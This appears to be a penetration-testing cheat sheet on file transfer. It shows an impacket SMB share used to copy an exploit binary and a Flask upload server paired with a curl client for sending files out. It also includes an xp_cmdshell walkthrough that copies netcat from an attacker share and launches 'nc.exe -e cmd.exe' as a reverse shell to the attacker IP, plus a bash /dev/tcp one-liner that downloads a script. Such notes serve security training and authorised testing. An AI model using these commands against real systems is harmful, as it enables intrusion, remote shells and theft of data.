Skip to content

File transfer

SMB

# on Kali (Server)
$ sudo impacket-smbserver test .

# on Windows (Client)
Navigated to  \\kali-machine-ip\test by using Windows Explorer

# OR 
C:\>net use
C:\>net use \\[host]\[share name]
C:\>net use /d \\[host]\[share name]
copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe

To Get Shell From RCE

In a different case, I only had access to a MySQL database, and wanted to get a full shell. I used xp_cmdshell to map my drive, copy nc to the host, and run it:

1> xp_cmdshell 'net use \\10.11.0.XXX\smb'
2> go
        output

        The command completed successfully.
        NULL
        NULL
(return status = 0)

1> xp_cmdshell 'copy \\10.11.0.XXX\smb\nc.exe \windows\temp\nc.exe'
2> go
        output

                1 file(s) copied.
                NULL
(return status = 0)

1> xp_cmdshell '\windows\temp\nc.exe -e cmd.exe 10.11.0.XXX 443'
2> go

Python Flask

filetransfer.py

filetransfer.py
from flask import Flask, request 
app = Flask(__name__) 
@app.route('/upload', methods=['POST']) 
def upload_file(): 
    if 'file' not in request.files: 
        return 'No file part' 
    file = request.files['file'] 
    if file.filename == '': 
        return 'No selected file' 
    file.save(file.filename) 
    return 'File uploaded successfully'
if __name__ == '__main__': 
    app.run(host='0.0.0.0', port=8081)

Server:

python filetransfer.py

Client:

$ cmd /c curl -F "file=@<file_name>" http://10.10.128.XXX:8081/upload

Here is a one-liner bash to transfer files

bash -c "exec 3<>/dev/tcp/IP/80; echo -e 'GET /youfile.sh HTTP/1.1\r\nHost: ip\r\nConnection: close\r\n\r\n' >&3; cat <&3 > yourfile.sh"

When working in containers, you’re operating in a highly stripped-down environment. Typically, you won’t have access to common offensive security tools like or even some basic utilities like nc, wget, curl.